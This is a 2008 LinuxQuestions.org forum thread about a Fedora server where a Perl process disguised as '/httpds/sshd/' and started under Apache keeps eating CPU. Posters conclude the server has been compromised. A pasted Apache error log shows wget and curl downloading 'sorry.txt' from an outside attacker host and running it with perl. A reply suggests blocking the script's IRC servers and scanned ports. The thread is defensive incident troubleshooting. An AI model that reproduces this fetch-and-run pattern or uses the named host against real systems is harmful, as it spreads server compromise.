LinuxQuestions.org - Perl eating CPU Time

- Linux - Server (https://www.linuxquestions.org/questions/linux-server-73/)

- - Perl eating CPU Time - what is "/httpds/sshd/" (https://www.linuxquestions.org/questions/linux-server-73/perl-eating-cpu-time-what-is-httpds-sshd-612370/)

Perl eating CPU Time - what is "/httpds/sshd/"

Hi All,

Since few weeks my server slooooow down sometimes and when I log me in via SSH I can see that the perl process eating CPU time. The only one solution is too kill those processes one after another (because it resurrect ;) )

I see that this process has been started by Apache so I'm afraid that it could be hack attempt.

Code:

# top

13599 apache    25  0  5088 2868 1200 R 97.1  0.3  27:36.12 perl

Code:

#ps aux | grep 13599

apache  13599 52.0  0.2  5088  2868 ?        R    14:27  27:44 /httpds/sshd/

Could someone tell me what "/httpds/sshd/" is?

I use ssh and sftp instantly.
I have already disabled the apache perl module.
The OS is: Fedora Core 5 2.6.20-1.2320.fc5
Apache: 2.2.2
PHP: 5.1.6

Any help is very appreciated :-)

Best Regards,
Neo

perl doesn't run like that unless a user most likely runs a script, etc. Sounds to me like you possibly got hacked. I'd say you may want to unplug this machine from the network to do a full investigation. Unless you have something with apache that kicks off a perl script/program, etc.

The problem is I cannot unplug this machine because this is leased root server :confused:

I saw that webmin starts also some perl processes but they not causing this problem I think.

How can I found who starts this processes and what is "/httpds/sshd/"

I'm trying to be very carefully with this server. No root access, complicated password, I check regularly the logfiles but I didn't saw something suspect :(

Leased root server? I'd suggest asking the people you lease it from then. But seriously, if there are processes you don't know about or how they start and you are in full control of this server, better start asking questions to your provider.

httpds/sshd sounds to me like some type of web enabled ssh program I would guess. That's why I'd suggest asking the lease provider. Most likely this server of yours could just be a virtual server and they might have programs running to monitor, applications you may not want running, etc.

I cannot ask my provider because this is a root server. So this mean I have a physical server in theirs server room. But this is my server, it's not virtual. So this mean that they does not installed any programs there and only support is for hardware or networks connection.

Regards,
Neo

It seems to be hack attempt. I saw this in my general apache error logfile:

Code:



  % Total    % Received % Xferd  Average Speed  Time    Time    Time  Current

                                Dload  Upload  Total  Spent    Left  Speed

100 13685  100 13685    0    0  2267      0  0:00:06  0:00:06 --:--:-- 35000

sh: line 1: 13589 Killed                  perl sorry.txt

--14:27:07--  http://hakkah.fateback.com/sorry.txt

Resolving hakkah.fateback.com... 216.65.1.200

Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 13685 (13K) [text/plain]

Saving to: `sorry.txt'



    0K .......... ...                                        100% 37.4K=0.4s



14:27:09 (37.4 KB/s) - `sorry.txt' saved [13685/13685]



sh: fetch: command not found

Can't open perl script "sorry.txt": No such file or directory

sh: fetch: command not found

Can't open perl script "sorry.txt": No such file or directory

--15:20:31--  http://hakkah.fateback.com/sorry.txt

Resolving hakkah.fateback.com... 216.65.1.200

Connecting to hakkah.fateback.com|216.65.1.200|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 13685 (13K) [text/plain]

Saving to: `sorry.txt'



    0K .......... ...                                        100% 34.6K=0.4s



15:20:33 (34.6 KB/s) - `sorry.txt' saved [13685/13685]



  % Total    % Received % Xferd  Average Speed  Time    Time    Time  Current

                                Dload  Upload  Total  Spent    Left  Speed

100 13685  100 13685    0    0  16702      0 --:--:-- --:--:-- --:--:-- 32962

[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.

[Wed Jan 09 17:55:42 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.

[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.

[Wed Jan 09 17:55:48 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.

Can't open perl script "sorry.txt": No such file or directory

[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.

[Thu Jan 10 02:39:31 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.

[Thu Jan 10 02:39:32 2008] [error] [client 208.186.169.183] File does not exist: /var/www/sigsiu/html/ebay/zenphoto

[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-f' is not supported and will be ignored.

[Thu Jan 10 02:39:32 2008] [warn] RewriteCond: NoCase option for non-regex pattern '-d' is not supported and will be ignored.

I think that it does not work. But how it is possible if apache perl module is disabled?

Well, I would start by renaming perl to perl2 and killing the processes. (Temporary.)

Then, put in hosts entries for the IRC servers it uses, so it can't communicate out.

It has a list of ports it scans, I would also AFP block any of those which aren't in use legitimately.

A lot of it is in Spanish, so it's unclear.

Now, I would look for how it got there in the first place. Uploaded by user? That part I've shaky on.